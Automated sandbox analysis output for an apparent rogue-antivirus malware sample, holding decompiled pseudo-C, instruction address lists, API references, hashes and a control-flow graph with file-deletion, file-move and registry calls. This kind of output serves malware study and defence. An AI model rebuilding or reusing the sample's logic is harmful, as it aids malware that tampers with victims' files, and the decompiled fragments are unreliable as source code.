                                                                                                                                                      													_v104 = _v104 | _t382;
                                                                                                                                                      													_t548 = _t548 - 1;
                                                                                                                                                      													__eflags = _t548;
                                                                                                                                                      												} while (_t548 != 0);
                                                                                                                                                      												goto L68;
                                                                                                                                                      											}
                                                                                                                                                      											L69:
                                                                                                                                                      											_v20 = _v20 + 1;
                                                                                                                                                      											_v12 = _v12 - 4;
                                                                                                                                                      											__eflags = _v12 - 0xfffffffc;
                                                                                                                                                      										} while (_v12 > 0xfffffffc);
                                                                                                                                                      										goto L70;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								_t514 = _t465 - 6;
                                                                                                                                                      								__eflags = _t514;
                                                                                                                                                      								if(_t514 == 0) {
                                                                                                                                                      									goto L33;
                                                                                                                                                      								} else {
                                                                                                                                                      									__eflags = _t514 == 1;
                                                                                                                                                      									if(_t514 == 1) {
                                                                                                                                                      										asm("movsd");
                                                                                                                                                      										asm("movsd");
                                                                                                                                                      										asm("movsd");
                                                                                                                                                      										_t568 = _t440 + 0x5398;
                                                                                                                                                      										__eflags =  *_t568 & 0x00000002;
                                                                                                                                                      										if(( *_t568 & 0x00000002) != 0) {
                                                                                                                                                      											E00408E05( &_v56, _t440 + 0x539c);
                                                                                                                                                      										}
                                                                                                                                                      										__eflags =  *_t568 & 0x00000008;
                                                                                                                                                      										if(( *_t568 & 0x00000008) != 0) {
                                                                                                                                                      											E00408DC6( &_v56, _t440 + 0x53a0);
                                                                                                                                                      										}
                                                                                                                                                      									} else {
                                                                                                                                                      										__eflags =  *_t533 & 0x00008000;
                                                                                                                                                      										if(( *_t533 & 0x00008000) != 0) {
                                                                                                                                                      											E00408E05( &_v56,  &_v12);
                                                                                                                                                      											 *((intOrPtr*)(_t440 + 0x6d80)) =  *((intOrPtr*)(_t440 + 0x6d80)) + _v12;
                                                                                                                                                      											asm("adc dword [ebx+0x6d84], 0x0");
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									goto L76;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *_t533 & 0x00000002;
                                                                                                                                                      							if(( *_t533 & 0x00000002) != 0) {
                                                                                                                                                      								goto L19;
                                                                                                                                                      							}
                                                                                                                                                      							goto L22;
                                                                                                                                                      						}
                                                                                                                                                      						L19:
                                                                                                                                                      						_push(6);
                                                                                                                                                      						goto L23;
                                                                                                                                                      					} else {
                                                                                                                                                      						E0040B2A9(_t440 + 0x17, E004098F7(0x68), "???");
                                                                                                                                                      						 *((char*)(_t440 + 0x6d98)) = 1;
                                                                                                                                                      						E0040325C(0x414c7c, 3);
                                                                                                                                                      						goto L6;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t526 =  *(__ecx + 0x6d7c);
                                                                                                                                                      				_t429 =  *((intOrPtr*)(__ecx + 0x6d94)) + 0x14;
                                                                                                                                                      				asm("adc ecx, ecx");
                                                                                                                                                      				_t578 = _t526;
                                                                                                                                                      				if(_t578 < 0 || _t578 <= 0 &&  *((intOrPtr*)(__ecx + 0x6d78)) < _t429) {
                                                                                                                                                      					goto L10;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t554 = _t440 + 0xe60;
                                                                                                                                                      					_v5 = 1;
                                                                                                                                                      					if(E0040568A(_t440, _t526, _t440 + 0xe60, 8) == 8) {
                                                                                                                                                      						_t432 =  *((intOrPtr*)(_t440 + 0x1390)) + 0x2418;
                                                                                                                                                      						__eflags =  *_t432;
                                                                                                                                                      						if( *_t432 == 0) {
                                                                                                                                                      							_t432 = E00402C96(2, _t440 + 0x17, _t432, 0x80);
                                                                                                                                                      							__eflags = _t432;
                                                                                                                                                      							if(_t432 == 0) {
                                                                                                                                                      								E00404F2E(_t440);
                                                                                                                                                      								_t432 = L0040343E(0x414c7c, _t570, 0xff);
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						__eflags =  *((char*)(_t440 + 0x46a0)) - 0x24;
                                                                                                                                                      						_t569 = _t440 + 0xc20;
                                                                                                                                                      						asm("sbb al, al");
                                                                                                                                                      						__eflags =  *((intOrPtr*)(_t440 + 0x1390)) + 0x2418;
                                                                                                                                                      						E00402DBD(_t569, _t526,  *((intOrPtr*)(_t440 + 0x1390)) + 0x2418, _t554, 0, 0, _t432 + 0x00000001 & 0x000000ff);
                                                                                                                                                      						_v32 = _t569;
                                                                                                                                                      						goto L15;
                                                                                                                                                      					}
                                                                                                                                                      					goto L5;
                                                                                                                                                      				}
                                                                                                                                                      			}





















































































                                                                                                                                                      0x00401ce5
                                                                                                                                                      0x00401ced
                                                                                                                                                      0x00401cf5
                                                                                                                                                      0x00401cf7
                                                                                                                                                      0x00401d00
                                                                                                                                                      0x00401d06
                                                                                                                                                      0x00401d0c
                                                                                                                                                      0x00401d18
                                                                                                                                                      0x00401d72
                                                                                                                                                      0x00401d72
                                                                                                                                                      0x00401de3
                                                                                                                                                      0x00401de8
                                                                                                                                                      0x00401ded
                                                                                                                                                      0x00401df1
                                                                                                                                                      0x00401d56
                                                                                                                                                      0x00401d58
                                                                                                                                                      0x00401d5d
                                                                                                                                                      0x00401d5d
                                                                                                                                                      0x00401d61
                                                                                                                                                      0x00401d61
                                                                                                                                                      0x00401d66
                                                                                                                                                      0x00401d66
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401d6b
                                                                                                                                                      0x00401e01
                                                                                                                                                      0x00401e0d
                                                                                                                                                      0x00401e16
                                                                                                                                                      0x00401e20
                                                                                                                                                      0x00401e26
                                                                                                                                                      0x00401e2b
                                                                                                                                                      0x00401e35
                                                                                                                                                      0x00401e3a
                                                                                                                                                      0x00401e3d
                                                                                                                                                      0x00401e41
                                                                                                                                                      0x00401e74
                                                                                                                                                      0x00401e7a
                                                                                                                                                      0x00401e7d
                                                                                                                                                      0x00401e83
                                                                                                                                                      0x00401e86
                                                                                                                                                      0x00401e8d
                                                                                                                                                      0x00401e90
                                                                                                                                                      0x00401e90
                                                                                                                                                      0x00401e93
                                                                                                                                                      0x00401e94
                                                                                                                                                      0x00401e97
                                                                                                                                                      0x00401e9f
                                                                                                                                                      0x00401ea6
                                                                                                                                                      0x00401eac
                                                                                                                                                      0x00401eb2
                                                                                                                                                      0x00401eba
                                                                                                                                                      0x00401eba
                                                                                                                                                      0x00401ebd
                                                                                                                                                      0x00401ec3
                                                                                                                                                      0x004023ad
                                                                                                                                                      0x004023ae
                                                                                                                                                      0x004023b9
                                                                                                                                                      0x004023ba
                                                                                                                                                      0x004023c9
                                                                                                                                                      0x004023d3
                                                                                                                                                      0x004023da
                                                                                                                                                      0x004023e6
                                                                                                                                                      0x004023e6
                                                                                                                                                      0x004023eb
                                                                                                                                                      0x004023f1
                                                                                                                                                      0x004023f6
                                                                                                                                                      0x004023fa
                                                                                                                                                      0x00402400
                                                                                                                                                      0x00402402
                                                                                                                                                      0x00402409
                                                                                                                                                      0x0040240f
                                                                                                                                                      0x004024c1
                                                                                                                                                      0x004024c7
                                                                                                                                                      0x004024cd
                                                                                                                                                      0x004024fa
                                                                                                                                                      0x004024fa
                                                                                                                                                      0x004024fd
                                                                                                                                                      0x00402500
                                                                                                                                                      0x00402505
                                                                                                                                                      0x00402505
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040250a
                                                                                                                                                      0x004024cf
                                                                                                                                                      0x004024df
                                                                                                                                                      0x004024f0
                                                                                                                                                      0x004024a6
                                                                                                                                                      0x004024ad
                                                                                                                                                      0x004024b4
                                                                                                                                                      0x004024b9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004024b9
                                                                                                                                                      0x004024d7
                                                                                                                                                      0x004024dd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004024dd
                                                                                                                                                      0x0040241b
                                                                                                                                                      0x0040241e
                                                                                                                                                      0x00402424
                                                                                                                                                      0x0040242a
                                                                                                                                                      0x00402431
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402437
                                                                                                                                                      0x0040243a
                                                                                                                                                      0x0040248a
                                                                                                                                                      0x00402497
                                                                                                                                                      0x004024a1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004024a1
                                                                                                                                                      0x0040243c
                                                                                                                                                      0x00402443
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402449
                                                                                                                                                      0x00402450
                                                                                                                                                      0x00402455
                                                                                                                                                      0x00402458
                                                                                                                                                      0x00402459
                                                                                                                                                      0x00402459
                                                                                                                                                      0x0040245b
                                                                                                                                                      0x0040245d
                                                                                                                                                      0x0040245e
                                                                                                                                                      0x00402461
                                                                                                                                                      0x00402466
                                                                                                                                                      0x0040246a
                                                                                                                                                      0x0040246c
                                                                                                                                                      0x00402471
                                                                                                                                                      0x00402473
                                                                                                                                                      0x00402475
                                                                                                                                                      0x00402475
                                                                                                                                                      0x00402479
                                                                                                                                                      0x00402479
                                                                                                                                                      0x00402479
                                                                                                                                                      0x0040247f
                                                                                                                                                      0x00402484
                                                                                                                                                      0x00402488
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402488
                                                                                                                                                      0x00401ec9
                                                                                                                                                      0x00401ec9
                                                                                                                                                      0x00401eca
                                                                                                                                                      0x00401f49
                                                                                                                                                      0x00401f49
                                                                                                                                                      0x00401f4c
                                                                                                                                                      0x00401f52
                                                                                                                                                      0x00401f54
                                                                                                                                                      0x00401f54
                                                                                                                                                      0x00401f62
                                                                                                                                                      0x00401f63
                                                                                                                                                      0x00401f64
                                                                                                                                                      0x00401f6e
                                                                                                                                                      0x00401f6f
                                                                                                                                                      0x00401f72
                                                                                                                                                      0x00401f77
                                                                                                                                                      0x00401f7a
                                                                                                                                                      0x00401f81
                                                                                                                                                      0x00401f84
                                                                                                                                                      0x00401f89
                                                                                                                                                      0x00401f90
                                                                                                                                                      0x00401f95
                                                                                                                                                      0x00401f9c
                                                                                                                                                      0x00401fa1
                                                                                                                                                      0x00401fa8
                                                                                                                                                      0x00401fab
                                                                                                                                                      0x00401fb0
                                                                                                                                                      0x00401fb7
                                                                                                                                                      0x00401fbc
                                                                                                                                                      0x00401fc3
                                                                                                                                                      0x00401fc8
                                                                                                                                                      0x00401fcf
                                                                                                                                                      0x00401fd2
                                                                                                                                                      0x00401fd7
                                                                                                                                                      0x00401fde
                                                                                                                                                      0x00401fe8
                                                                                                                                                      0x00401fe8
                                                                                                                                                      0x00401feb
                                                                                                                                                      0x00401fef
                                                                                                                                                      0x0040200b
                                                                                                                                                      0x0040200e
                                                                                                                                                      0x00402011
                                                                                                                                                      0x00402011
                                                                                                                                                      0x00402014
                                                                                                                                                      0x00402017
                                                                                                                                                      0x0040201a
                                                                                                                                                      0x0040201d
                                                                                                                                                      0x0040201f
                                                                                                                                                      0x00402024
                                                                                                                                                      0x00402026
                                                                                                                                                      0x00402026
                                                                                                                                                      0x00401ff1
                                                                                                                                                      0x00401ff5
                                                                                                                                                      0x00401ffa
                                                                                                                                                      0x00402001
                                                                                                                                                      0x00402004
                                                                                                                                                      0x00402004
                                                                                                                                                      0x00402041
                                                                                                                                                      0x0040204d
                                                                                                                                                      0x0040204f
                                                                                                                                                      0x00402061
                                                                                                                                                      0x0040206a
                                                                                                                                                      0x0040206d
                                                                                                                                                      0x0040206f
                                                                                                                                                      0x00402076
                                                                                                                                                      0x0040207c
                                                                                                                                                      0x0040207f
                                                                                                                                                      0x00402081
                                                                                                                                                      0x00402081
                                                                                                                                                      0x0040208f
                                                                                                                                                      0x0040209f
                                                                                                                                                      0x004020a4
                                                                                                                                                      0x004020ac
                                                                                                                                                      0x004020af
                                                                                                                                                      0x004020b4
                                                                                                                                                      0x004020b7
                                                                                                                                                      0x004020ba
                                                                                                                                                      0x00402147
                                                                                                                                                      0x0040214a
                                                                                                                                                      0x00402155
                                                                                                                                                      0x00402159
                                                                                                                                                      0x004021e2
                                                                                                                                                      0x004021e4
                                                                                                                                                      0x0040215f
                                                                                                                                                      0x00402162
                                                                                                                                                      0x0040216e
                                                                                                                                                      0x00402176
                                                                                                                                                      0x00402179
                                                                                                                                                      0x00402179
                                                                                                                                                      0x0040217f
                                                                                                                                                      0x00402181
                                                                                                                                                      0x004021b6
                                                                                                                                                      0x004021cc
                                                                                                                                                      0x00402183
                                                                                                                                                      0x00402190
                                                                                                                                                      0x0040219e
                                                                                                                                                      0x004021a9
                                                                                                                                                      0x004021a9
                                                                                                                                                      0x004021d1
                                                                                                                                                      0x004021d5
                                                                                                                                                      0x004021dc
                                                                                                                                                      0x004021dc
                                                                                                                                                      0x004021d5
                                                                                                                                                      0x004021ed
                                                                                                                                                      0x004021ed
                                                                                                                                                      0x004020c0
                                                                                                                                                      0x004020d1
                                                                                                                                                      0x004020d4
                                                                                                                                                      0x004020d8
                                                                                                                                                      0x004020da
                                                                                                                                                      0x004020da
                                                                                                                                                      0x004020da
                                                                                                                                                      0x004020dd
                                                                                                                                                      0x004020df
                                                                                                                                                      0x004020e5
                                                                                                                                                      0x004020ec
                                                                                                                                                      0x004020fb
                                                                                                                                                      0x00402108
                                                                                                                                                      0x0040210d
                                                                                                                                                      0x0040210f
                                                                                                                                                      0x0040213c
                                                                                                                                                      0x0040213c
                                                                                                                                                      0x0040210f
                                                                                                                                                      0x004020df
                                                                                                                                                      0x004021f7
                                                                                                                                                      0x004021fb
                                                                                                                                                      0x004021ff
                                                                                                                                                      0x00402209
                                                                                                                                                      0x00402209
                                                                                                                                                      0x00402213
                                                                                                                                                      0x00402219
                                                                                                                                                      0x00402225
                                                                                                                                                      0x0040222b
                                                                                                                                                      0x00402231
                                                                                                                                                      0x00402237
                                                                                                                                                      0x0040223b
                                                                                                                                                      0x00402319
                                                                                                                                                      0x0040231f
                                                                                                                                                      0x0040232e
                                                                                                                                                      0x0040233c
                                                                                                                                                      0x00402347
                                                                                                                                                      0x00402349
                                                                                                                                                      0x00402350
                                                                                                                                                      0x00402353
                                                                                                                                                      0x00402359
                                                                                                                                                      0x0040235c
                                                                                                                                                      0x00402360
                                                                                                                                                      0x0040236a
                                                                                                                                                      0x0040236a
                                                                                                                                                      0x00402376
                                                                                                                                                      0x0040237d
                                                                                                                                                      0x00402385
                                                                                                                                                      0x00402397
                                                                                                                                                      0x0040239c
                                                                                                                                                      0x0040239c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402241
                                                                                                                                                      0x00402248
                                                                                                                                                      0x00402253
                                                                                                                                                      0x0040225c
                                                                                                                                                      0x00402265
                                                                                                                                                      0x0040226e
                                                                                                                                                      0x00402271
                                                                                                                                                      0x00402274
                                                                                                                                                      0x0040227b
                                                                                                                                                      0x0040227e
                                                                                                                                                      0x00402289
                                                                                                                                                      0x0040228b
                                                                                                                                                      0x0040228e
                                                                                                                                                      0x00402290
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402292
                                                                                                                                                      0x00402296
                                                                                                                                                      0x0040229f
                                                                                                                                                      0x004022a9
                                                                                                                                                      0x004022ae
                                                                                                                                                      0x004022ba
                                                                                                                                                      0x004022be
                                                                                                                                                      0x004022be
                                                                                                                                                      0x004022c0
                                                                                                                                                      0x004022c2
                                                                                                                                                      0x004022c4
                                                                                                                                                      0x004022c4
                                                                                                                                                      0x004022c4
                                                                                                                                                      0x004022c4
                                                                                                                                                      0x004022c7
                                                                                                                                                      0x004022cd
                                                                                                                                                      0x004022ce
                                                                                                                                                      0x004022ce
                                                                                                                                                      0x004022d0
                                                                                                                                                      0x004022f6
                                                                                                                                                      0x004022ff
                                                                                                                                                      0x00402303
                                                                                                                                                      0x00402303
                                                                                                                                                      0x00402305
                                                                                                                                                      0x004022d2
                                                                                                                                                      0x004022d4
                                                                                                                                                      0x004022d4
                                                                                                                                                      0x004022d7
                                                                                                                                                      0x004022d9
                                                                                                                                                      0x004022e0
                                                                                                                                                      0x004022eb
                                                                                                                                                      0x004022ed
                                                                                                                                                      0x004022f0
                                                                                                                                                      0x004022f3
                                                                                                                                                      0x004022f3
                                                                                                                                                      0x004022f3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004022d9
                                                                                                                                                      0x00402308
                                                                                                                                                      0x00402308
                                                                                                                                                      0x0040230b
                                                                                                                                                      0x0040230f
                                                                                                                                                      0x0040230f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040227b
                                                                                                                                                      0x0040223b
                                                                                                                                                      0x00401ecc
                                                                                                                                                      0x00401ecc
                                                                                                                                                      0x00401ecf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401ed1
                                                                                                                                                      0x00401ed1
                                                                                                                                                      0x00401ed2
                                                                                                                                                      0x00401f0f
                                                                                                                                                      0x00401f10
                                                                                                                                                      0x00401f11
                                                                                                                                                      0x00401f12
                                                                                                                                                      0x00401f18
                                                                                                                                                      0x00401f1b
                                                                                                                                                      0x00401f27
                                                                                                                                                      0x00401f27
                                                                                                                                                      0x00401f2c
                                                                                                                                                      0x00401f2f
                                                                                                                                                      0x00401f3f
                                                                                                                                                      0x00401f3f
                                                                                                                                                      0x00401ed4
                                                                                                                                                      0x00401ed9
                                                                                                                                                      0x00401edc
                                                                                                                                                      0x00401ee9
                                                                                                                                                      0x00401ef1
                                                                                                                                                      0x00401ef7
                                                                                                                                                      0x00401ef7
                                                                                                                                                      0x00401edc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401ed2
                                                                                                                                                      0x00401ecf
                                                                                                                                                      0x00401e88
                                                                                                                                                      0x00401e8b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e8b
                                                                                                                                                      0x00401e7f
                                                                                                                                                      0x00401e7f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e43
                                                                                                                                                      0x00401e54
                                                                                                                                                      0x00401e63
                                                                                                                                                      0x00401e6a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e6a
                                                                                                                                                      0x00401e41
                                                                                                                                                      0x00401d20
                                                                                                                                                      0x00401d28
                                                                                                                                                      0x00401d2b
                                                                                                                                                      0x00401d2d
                                                                                                                                                      0x00401d2f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401d3d
                                                                                                                                                      0x00401d3f
                                                                                                                                                      0x00401d48
                                                                                                                                                      0x00401d54
                                                                                                                                                      0x00401d7e
                                                                                                                                                      0x00401d83
                                                                                                                                                      0x00401d86
                                                                                                                                                      0x00401d94
                                                                                                                                                      0x00401d99
                                                                                                                                                      0x00401d9b
                                                                                                                                                      0x00401d9f
                                                                                                                                                      0x00401dae
                                                                                                                                                      0x00401dae
                                                                                                                                                      0x00401d9b
                                                                                                                                                      0x00401db3
                                                                                                                                                      0x00401dba
                                                                                                                                                      0x00401dc0
                                                                                                                                                      0x00401dd3
                                                                                                                                                      0x00401ddb
                                                                                                                                                      0x00401de0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401de0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401d54

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00404FDC: SetFilePointer.KERNELBASE(00020000,00000000,00000000,00000001,?,?,?,?,0040A7FA,?,?,0040555D,?,?), ref: 00404FF3
                                                                                                                                                        • Part of subcall function 00404FDC: GetLastError.KERNEL32(?,0040A7FA,?,?,0040555D,?,?), ref: 00405000
                                                                                                                                                        • Part of subcall function 0040E115: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,?,00405198,?,?,01000000,?), ref: 0040E12F
                                                                                                                                                      • CharToOemA.USER32 ref: 004021A9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Char$ByteErrorFileLastMultiPointerWide
                                                                                                                                                      • String ID: - ???$???$|LA$|LA$|LA$|LA
                                                                                                                                                      • API String ID: 1784729808-3627379113
                                                                                                                                                      • Opcode ID: 537e6f83efcbe7b9c19135e0ebbc041a8dda03950bca739d7956154691084701
                                                                                                                                                      • Instruction ID: d3ae9a043b2c9d79d016dc6309aa3c7e2dade4953754a766d4f739c7a40d4fc9
                                                                                                                                                      • Opcode Fuzzy Hash: 537e6f83efcbe7b9c19135e0ebbc041a8dda03950bca739d7956154691084701
                                                                                                                                                      • Instruction Fuzzy Hash: 9132E1719002049BDF11DFA5C985AEE77BABF40304F14057FE946BB2D2EB786A44CB68
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1217 40c78e-40c792 1218 40c798-40c7a8 call 40a250 1217->1218 1219 40ca2a-40ca52 call 40b613 1217->1219 1226 40c7aa-40c7ad 1218->1226 1227 40c7cd 1218->1227 1224 40bfe1-40c001 1219->1224 1225 40ca58-40ca5c 1219->1225 1228 40c008-40c01b call 40a925 1224->1228 1230 40c7c4-40c7cb 1226->1230 1231 40c7af-40c7b0 1226->1231 1232 40c7d4-40c7fc call 40a477 1227->1232 1242 40c01d 1228->1242 1230->1232 1236 40c7b2-40c7b9 1231->1236 1237 40c7bb-40c7c2 1231->1237 1240 40c83d-40c84d call 405767 1232->1240 1241 40c7fe-40c821 call 40a477 call 4073ab 1232->1241 1236->1232 1237->1232 1252 40c8c0-40c8c7 1240->1252 1253 40c84f-40c85e 1240->1253 1241->1252 1268 40c827-40c838 call 40a477 1241->1268 1244 40c021-40c03a lstrcmpiA 1242->1244 1247 40c04a-40c04e 1244->1247 1248 40c03c-40c043 1244->1248 1247->1219 1254 40c054-40c057 1247->1254 1248->1244 1251 40c045 1248->1251 1251->1219 1257 40c8c9-40c8d7 call 405822 1252->1257 1258 40c8dc-40c911 call 405822 call 40aac2 call 4076c8 1252->1258 1253->1252 1256 40c860-40c865 1253->1256 1259 40c313-40c317 1254->1259 1260 40c2f4-40c2f8 1254->1260 1261 40c266-40c26a 1254->1261 1262 40c05e-40c062 1254->1262 1270 40c867-40c86a 1256->1270 1271 40c86c-40c87f call 405767 1256->1271 1257->1258 1317 40c932-40c952 call 40a477 1258->1317 1318 40c913-40c92d call 40a5e2 call 4076c8 1258->1318 1259->1219 1267 40c31d-40c324 1259->1267 1260->1219 1265 40c2fe-40c30e SetWindowTextA 1260->1265 1261->1219 1269 40c270-40c27c 1261->1269 1262->1219 1264 40c068-40c0ea GetCurrentDirectoryA call 40a477 call 4076c8 call 40a5e2 call 405bad call 405bdd call 403556 call 405fad 1262->1264 1381 40c0f0 1264->1381 1382 40c256-40c261 call 405bca 1264->1382 1265->1219 1267->1219 1276 40c32a-40c33e 1267->1276 1268->1252 1278 40c289-40c28d 1269->1278 1279 40c27e-40c284 call 40a5e2 1269->1279 1270->1271 1272 40c8b3-40c8b7 1270->1272 1291 40c8b1 1271->1291 1292 40c881-40c886 1271->1292 1272->1256 1289 40c8b9-40c8bb 1272->1289 1283 40c340 1276->1283 1284 40c346-40c351 call 40a384 1276->1284 1287 40c297-40c29f call 40b7ba 1278->1287 1288 40c28f-40c295 1278->1288 1279->1278 1283->1284 1284->1219 1312 40c357-40c35b 1284->1312 1295 40c2a1-40c2a3 1287->1295 1288->1295 1289->1252 1297 40c8bd 1289->1297 1291->1272 1301 40c888-40c898 1292->1301 1302 40c89a-40c89e 1292->1302 1298 40c2a5-40c2a7 1295->1298 1299 40c2a9-40c2b4 call 40a384 1295->1299 1297->1252 1306 40c2b6-40c2d3 call 40a384 call 40a224 1298->1306 1299->1306 1309 40c8a7-40c8af call 40a477 1301->1309 1302->1302 1310 40c8a0-40c8a1 1302->1310 1347 40c2d5 1306->1347 1348 40c2d8-40c2e3 call 40a5e2 1306->1348 1309->1272 1310->1309 1319 40c361-40c365 1312->1319 1320 40c408-40c40a 1312->1320 1342 40c954 1317->1342 1343 40c95a-40c97b call 4073db call 40a5e2 call 407690 1317->1343 1318->1317 1319->1320 1325 40c36b 1319->1325 1326 40c410-40c412 1320->1326 1327 40c36e-40c376 call 40a477 1320->1327 1325->1327 1332 40c414-40c418 1326->1332 1333 40c41e-40c438 RegOpenKeyExA 1326->1333 1339 40c37b-40c38b call 40a3d9 1327->1339 1332->1327 1332->1333 1340 40c469-40c470 1333->1340 1341 40c43a-40c463 RegQueryValueExA RegCloseKey 1333->1341 1357 40c396-40c3e1 call 40a477 call 40b9b0 GetDlgItem SetWindowTextA SendMessageA call 40a4e9 1339->1357 1358 40c38d-40c391 1339->1358 1344 40c472-40c489 call 40a384 1340->1344 1345 40c49c-40c4b8 call 40a384 * 2 1340->1345 1341->1340 1342->1343 1386 40c98c-40c998 call 40a5e2 1343->1386 1387 40c97d-40c98a call 40a59a 1343->1387 1344->1345 1366 40c48b-40c497 call 40a5e2 1344->1366 1345->1339 1379 40c4be-40c4cb call 40a5e2 1345->1379 1347->1348 1348->1219 1369 40c2e9-40c2ef call 40a205 1348->1369 1399 40c3e6-40c3e8 1357->1399 1358->1357 1364 40c393 1358->1364 1364->1357 1366->1345 1369->1219 1379->1219 1379->1339 1383 40c0f5-40c10b SetFileAttributesA 1381->1383 1382->1219 1389 40c111-40c119 call 406ea5 1383->1389 1390 40c1bb-40c1c7 GetFileAttributesA 1383->1390 1401 40c99d-40ca03 call 4058ff call 40a9bd 1386->1401 1387->1386 1387->1401 1389->1390 1408 40c11f-40c150 call 407300 call 4076c8 call 40a384 1389->1408 1397 40c1c9-40c1d8 DeleteFileA 1390->1397 1398 40c23a-40c250 call 405fad 1390->1398 1397->1398 1404 40c1da-40c1de 1397->1404 1398->1382 1398->1383 1399->1219 1405 40c3ee-40c403 SendMessageA 1399->1405 1401->1219 1418 40ca05-40ca1b SHChangeNotify 1401->1418 1409 40c1e6-40c206 wsprintfA GetFileAttributesA 1404->1409 1405->1219 1426 40c152-40c161 call 40a384 1408->1426 1427 40c163-40c173 call 407279 1408->1427 1412 40c1e0-40c1e3 1409->1412 1413 40c208-40c21e MoveFileA 1409->1413 1412->1409 1413->1398 1417 40c220-40c227 call 406ea5 1413->1417 1417->1398 1424 40c229-40c234 MoveFileExA 1417->1424 1418->1219 1424->1398 1426->1427 1432 40c179-40c1b5 call 40a384 call 40a289 SHFileOperationA 1426->1432 1427->1382 1427->1432 1432->1390
                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E0040C78E(void* __ecx, void* __esi) {
                                                                                                                                                      				intOrPtr _t231;
                                                                                                                                                      				void* _t232;
                                                                                                                                                      				void* _t307;
                                                                                                                                                      				void* _t309;
                                                                                                                                                      
                                                                                                                                                      				L0:
                                                                                                                                                      				while(1) {
                                                                                                                                                      					L0:
                                                                                                                                                      					_t307 = __esi;
                                                                                                                                                      					if( *((intOrPtr*)(_t309 + 0x10)) != 6) {
                                                                                                                                                      						goto L152;
                                                                                                                                                      					}
                                                                                                                                                      					L115:
                                                                                                                                                      					__eax =  *((char*)(__ebp - 0xb4dc));
                                                                                                                                                      					__eax = E0040A250(__ecx,  *((char*)(__ebp - 0xb4dc)));
                                                                                                                                                      					__eax = __eax - 0x50;
                                                                                                                                                      					__eflags = __eax;
                                                                                                                                                      					if(__eax == 0) {
                                                                                                                                                      						 *(__ebp - 4) = 2;
                                                                                                                                                      					} else {
                                                                                                                                                      						__eax = __eax - 3;
                                                                                                                                                      						__eflags = __eax;
                                                                                                                                                      						if(__eax == 0) {
                                                                                                                                                      							 *(__ebp - 4) = 0xb;
                                                                                                                                                      						} else {
                                                                                                                                                      							__eax = __eax - 1;
                                                                                                                                                      							__eflags = __eax;
                                                                                                                                                      							if(__eax == 0) {
                                                                                                                                                      								 *(__ebp - 4) = 7;
                                                                                                                                                      							} else {
                                                                                                                                                      								 *(__ebp - 4) = 0x10;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					__ebp - 0xa4dc = __ebp - 0xc34;
                                                                                                                                                      					 *(__ebp - 0x2034) = 0;
                                                                                                                                                      					 *(__ebp - 0x834) = 0;
                                                                                                                                                      					__eax = E0040A477(__ebp - 0xc34, __ebp - 0xa4dc);
                                                                                                                                                      					__eflags =  *(__ebp - 0xc34) - 0x22;
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						L125:
                                                                                                                                                      						__ebp - 0xc34 = E00405767(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                      						__eflags = __al;
                                                                                                                                                      						if(__al != 0) {
                                                                                                                                                      							goto L139;
                                                                                                                                                      						}
                                                                                                                                                      						L126:
                                                                                                                                                      						__edi = 0;
                                                                                                                                                      						__eflags =  *(__ebp - 0xc34);
                                                                                                                                                      						__esi = __ebp - 0xc34;
                                                                                                                                                      						if( *(__ebp - 0xc34) == 0) {
